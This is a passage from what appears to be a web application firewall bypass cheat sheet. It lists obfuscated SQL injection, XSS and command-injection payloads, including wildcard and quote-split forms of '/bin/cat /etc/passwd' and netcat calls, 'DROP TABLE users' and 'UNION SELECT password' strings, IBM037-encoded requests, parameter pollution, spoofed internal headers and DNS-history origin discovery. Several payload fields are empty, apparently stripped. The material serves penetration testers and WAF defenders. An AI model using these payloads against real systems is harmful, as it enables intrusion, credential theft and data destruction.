227 | **Blocked**: `` 228 | **Bypassed**: `` 229 | 230 | **Blocked**: `/?id=1+union+select+1,2,3--` 231 | **Bypassed**: `/?id=1+un/**/ion+sel/**/ect+1,2,3--` 232 | 233 | **7. Double Encoding** 234 | 235 | * Often WAF filters tend to encode characters to prevent attacks. 236 | * However poorly developed filters \(no recursion filters\) can be bypassed with double encoding. 237 | 238 | **Standard**: `http://victim/cgi/../../winnt/system32/cmd.exe?/c+dir+c:\` 239 | **Obfuscated**: `http://victim/cgi/%252E%252E%252F%252E%252E%252Fwinnt/system32/cmd.exe?/c+dir+c:\` 240 | 241 | **Standard**: `` 242 | **Obfuscated**: `%253Cscript%253Ealert()%253C%252Fscript%253E` 243 | 244 | **8. Wildcard Obfuscation** 245 | 246 | * Globbing patterns are used by various command-line utilities to work with multiple files. 247 | * We can tweak them to execute system commands. 248 | * Specific to remote code execution vulnerabilities on linux systems. 249 | 250 | **Standard**: `/bin/cat /etc/passwd` 251 | **Obfuscated**: `/???/??t /???/??ss??` 252 | Used chars: `/ ? t s` 253 | 254 | **Standard**: `/bin/nc 127.0.0.1 1337` 255 | **Obfuscated**: `/???/n? 2130706433 1337` 256 | Used chars: `/ ? n [0-9]` 257 | 258 | **9. Dynamic Payload Generation** 259 | 260 | * Different programming languages have different syntaxes and patterns for concatenation. 261 | * This allows us to effectively generate payloads that can bypass many filters and rules. 262 | 263 | **Standard**: `` 264 | **Obfuscated**: `` 265 | 266 | **Standard**: `/bin/cat /etc/passwd` 267 | **Obfuscated**: `/bi'n'''/c''at' /e'tc'/pa''ss'wd` 268 | 269 | > Bash allows path concatenation for execution. 270 | 271 | **Standard**: `` 330 | **Obfuscated**: 331 | 332 | ```text 333 | 334 | ``` 335 | 336 | **13. Token Breakers** 337 | 338 | * Attacks on tokenizers attempt to break the logic of splitting a request into tokens with the help of token breakers. 339 | * Token breakers are symbols that allow affecting the correspondence between an element of a string and a certain token, and thus bypass search by signature. 340 | * However, the request must still remain valid while using token-breakers. 341 | * **Case**: Unknown Token for the Tokenizer 342 | * **Payload**: `?id=‘-sqlite_version() UNION SELECT password FROM users --` 343 | * **Case**: Unknown Context for the Parser \(Notice the uncontexted bracket\) 344 | * **Payload 1**: `?id=123);DROP TABLE users --` 345 | * **Payload 2**: `?id=1337) INTO OUTFILE ‘xxx’ --` 346 | 347 | > **TIP:** More payloads can be crafted via this [cheat sheet](https://github.com/attackercan/cpp-sql-fuzzer). 348 | 349 | **14. Obfuscation in Other Formats** 350 | 351 | * Many web applications support different encoding types and can interpret the encoding \(see below\). 352 | * Obfuscating our payload to a format not supported by WAF but the server can smuggle our payload in. 353 | 354 | **Case:** IIS 355 | 356 | * IIS6, 7.5, 8 and 10 \(ASPX v4.x\) allow **IBM037** character interpretations. 357 | * We can encode our payload and send the encoded parameters with the query. 358 | 359 | Original Request: 360 | 361 | ```text 362 | POST /sample.aspx?id1=something HTTP/1.1 363 | HOST: victim.com 364 | Content-Type: application/x-www-form-urlencoded; charset=utf-8 365 | Content-Length: 41 366 | 367 | id2='union all select * from users-- 368 | ``` 369 | 370 | Obfuscated Request + URL Encoding: 371 | 372 | ```text 373 | POST /sample.aspx?%89%84%F1=%A2%96%94%85%A3%88%89%95%87 HTTP/1.1 374 | HOST: victim.com 375 | Content-Type: application/x-www-form-urlencoded; charset=ibm037 376 | Content-Length: 115 377 | 378 | %89%84%F2=%7D%A4%95%89%96%95%40%81%93%93%40%A2%85%93%85%83%A3%40%5C%40%86%99%96%94%40%A4%A2%85%99%A2%60%60 379 | ``` 380 | 381 | 382 | 383 | #### HTTP Parameter Pollution 384 | 385 | **Method:** 386 | 387 | * This attack method is based on how a server interprets parameters with the same names. 388 | * Possible bypass chances here are: 389 | * The server uses the last received parameter, and WAF checks only the first. 390 | * The server unites the value from similar parameters, and WAF checks them separately. 391 | 392 | **Technique:** 393 | 394 | * The idea is to enumerate how the parameters are being interpreted by the server. 395 | * In such a case we can pass the payload to a parameter which isn't being inspected by the WAF. 396 | * Distributing a payload across parameters which can later get concatenated by the server is also useful. 397 | 398 | Below is a comparison of different servers and their relative interpretations: 399 | 400 | | **Environment** | **Parameter Interpretation** | **Example** | 401 | | :--- | :--- | :--- | 402 | | ASP/IIS | Concatenation by comma | par1=val1,val2 | 403 | | JSP, Servlet/Apache Tomcat | First parameter is resulting | par1=val1 | 404 | | ASP.NET/IIS | Concatenation by comma | par1=val1,val2 | 405 | | PHP/Zeus | Last parameter is resulting | par1=val2 | 406 | | PHP/Apache | Last parameter is resulting | par1=val2 | 407 | | JSP, Servlet/Jetty | First parameter is resulting | par1=val1 | 408 | | IBM Lotus Domino | First parameter is resulting | par1=val1 | 409 | | IBM HTTP Server | Last parameter is resulting | par1=val2 | 410 | | mod\_perl, libapeq2/Apache | First parameter is resulting | par1=val1 | 411 | | Oracle Application Server 10G | First parameter is resulting | par1=val1 | 412 | | Perl CGI/Apache | First parameter is resulting | par1=val1 | 413 | | Python/Zope | First parameter is resulting | par1=val1 | 414 | | IceWarp | An array is returned | \['val1','val2'\] | 415 | | AXIS 2400 | Last parameter is resulting | par1=val2 | 416 | | DBMan | Concatenation by two tildes | par1=val1~~val2 | 417 | | mod-wsgi \(Python\)/Apache | An array is returned | ARRAY\(0x8b9058c\) | 418 | 419 | #### HTTP Parameter Fragmentation 420 | 421 | * HPF is based on the principle where the server unites the value being passed along the parameters. 422 | * We can split the payload into different components and then pass the values via the parameters. 423 | 424 | **Sample Payload**: `1001 RLIKE (-(-1)) UNION SELECT 1 FROM CREDIT_CARDS` 425 | **Sample Query URL**: `http://test.com/url?a=1001+RLIKE&b=(-(-1))+UNION&c=SELECT+1&d=FROM+CREDIT_CARDS` 426 | 427 | > **TIP:** A real life example how bypasses can be crafted using this method can be found [here](http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2009-August/005673.html). 428 | 429 | #### Browser Bugs: 430 | 431 | **Charset Bugs:** 432 | 433 | * We can try changing charset header to higher Unicode \(eg. UTF-32\) and test payloads. 434 | * When the site decodes the string, the payload gets triggered. 435 | 436 | Example request: 437 | 438 | ```text 439 | GET /page.php?p=∀㸀㰀script㸀alert(1)㰀/script㸀 HTTP/1.1 440 | Host: site.com 441 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0 442 | Accept-Charset:utf-32; q=0.5 443 | Accept-Language: en-US,en;q=0.5 444 | Accept-Encoding: gzip, deflate 445 | ``` 446 | 447 | When the site loads, it will be encoded to the UTF-32 encoding that we set, and then as the output encoding of the page is UTF-8, it will be rendered as: `" 538 | 539 | 540 | ``` 541 | 542 | * **Case:** SQLi 543 | 544 | ```text 545 | SELECT if(LPAD(' ',4,version())='5.7',sleep(5),null); 546 | 1%0b||%0bLPAD(USER,7,1) 547 | ``` 548 | 549 | Many alternatives to the original JavaScript can be used, namely: 550 | 551 | * [JSFuck](http://www.jsfuck.com/) 552 | * [JJEncode](http://utf-8.jp/public/jjencode.html) 553 | * [XChars.JS](https://syllab.fr/projets/experiments/xcharsjs/5chars.pipeline.html) 554 | 555 | > However the problem in using the above syntactical structures is the long payloads which might possibly be detected by the WAF or may be blocked by the CSP. However, you never know, they might bypass the CSP \(if present\) too. ;\) 556 | 557 | #### Abusing SSL/TLS Ciphers: 558 | 559 | * Many a times, servers do accept connections from various SSL/TLS ciphers and versions. 560 | * Using a cipher to initialise a connection to server which is not supported by the WAF can do our workload. 561 | 562 | **Technique:** 563 | 564 | * Dig out the ciphers supported by the firewall \(usually the WAF vendor documentation discusses this\). 565 | * Find out the ciphers supported by the server \(tools like [SSLScan](https://github.com/rbsec/sslscan) helps here\). 566 | * If a specific cipher not supported by WAF but by the server, is found, voila! 567 | * Initiating a new connection to the server with that specific cipher should smuggle our payload in. 568 | 569 | > **Tool**: [abuse-ssl-bypass-waf](https://github.com/LandGrey/abuse-ssl-bypass-waf) 570 | 571 | ```text 572 | python abuse-ssl-bypass-waf.py -thread 4 -target 573 | ``` 574 | 575 | CLI tools like cURL can come very handy for PoCs: 576 | 577 | ```text 578 | curl --ciphers -G -d 579 | ``` 580 | 581 | #### Abusing DNS History: 582 | 583 | * Often old historical DNS records provide information about the location of the site behind the WAF. 584 | * The target is to get the location of the site, so that we can route our requests directly to the site and not through the WAF. 585 | 586 | > **TIP:** Some online services like [IP History](http://www.iphistory.ch/en/) and [DNS Trails](https://securitytrails.com/dns-trails) come to the rescue during the recon process. 587 | 588 | **Tool**: [bypass-firewalls-by-DNS-history](https://github.com/vincentcox/bypass-firewalls-by-DNS-history) 589 | 590 | ```text 591 | bash bypass-firewalls-by-DNS-history.sh -d --checkall 592 | ``` 593 | 594 | #### Using Whitelist Strings: 595 | 596 | **Method:** 597 | 598 | * Some WAF developers keep a shared secret with their users/devs which allows them to pass harmful queries through the WAF. 599 | * This shared secret, if leaked/known, can be used to bypass all protections within the WAF. 600 | 601 | **Technique:** 602 | 603 | * Using the whitelist string as a paramter in GET/POST/PUT/DELETE requests smuggles our payload through the WAF. 604 | * Usually some `*-sync-request` keywords or a shared token value is used as the secret. 605 | 606 | Now when making a request to the server, you can append it as a parameter: 607 | 608 | ```text 609 | http://host.com/?randomparameter=&=True 610 | ``` 611 | 612 | > A real life example how this works can be found at [this blog](https://osandamalith.com/2019/10/12/bypassing-the-webarx-web-application-firewall-waf/). 613 | 614 | #### Request Header Spoofing: 615 | 616 | **Method:** 617 | 618 | * The target is to fool the WAF/server into believing it was from their internal network. 619 | * Adding some spoofed headers to represent the internal network, does the trick. 620 | 621 | **Technique:** 622 | 623 | * With each request some set of headers are to be added simultaneously thus spoofing the origin. 624 | * The upstream proxy/WAF misinterprets the request was from their internal network, and lets our gory payload through. 625 | 626 | Some common headers used: 627 | 628 | ```text 629 | X-Originating-IP: 127.0.0.1 630 | X-Forwarded-For: 127.0.0.1 631 | X-Remote-IP: 127.0.0.1 632 | X-Remote-Addr: 127.0.0.1 633 | X-Client-IP: 127.0.0.1 634 | ``` 635 | 636 | #### Google Dorks Approach: 637 | 638 | **Method:** 639 | 640 | * There are a lot of known bypasses of various web application firewalls \([see section](https://github.com/0xInfection/Awesome-WAF#known-bypasses)\). 641 | * With the help of google dorks, we can easily find bypasses. 642 | 643 | **Techniques:** 644 | 645 | Before anything else, you should hone up skills from [Google Dorks Cheat Sheet](http://pdf.textfiles.com/security/googlehackers.pdf). 646 | 647 | * Normal search: `+ waf bypass` 648 | * Searching for specific version exploits: `" " (bypass|exploit)` 649 | * For specific type bypass exploits: `"" + (bypass|exploit)` 650 | * On [Exploit DB](https://exploit-db.com/): `site:exploit-db.com + bypass` 651 | * On [0Day Inject0r DB](https://0day.today/): `site:0day.today + (bypass|exploit)` 652 | * On [Twitter](https://twitter.com/): `site:twitter.com + bypass` 653 | * On [Pastebin](https://pastebin.com/) `site:pastebin.com + bypass` 654 | 655 | --------------------------------------------------------------------------------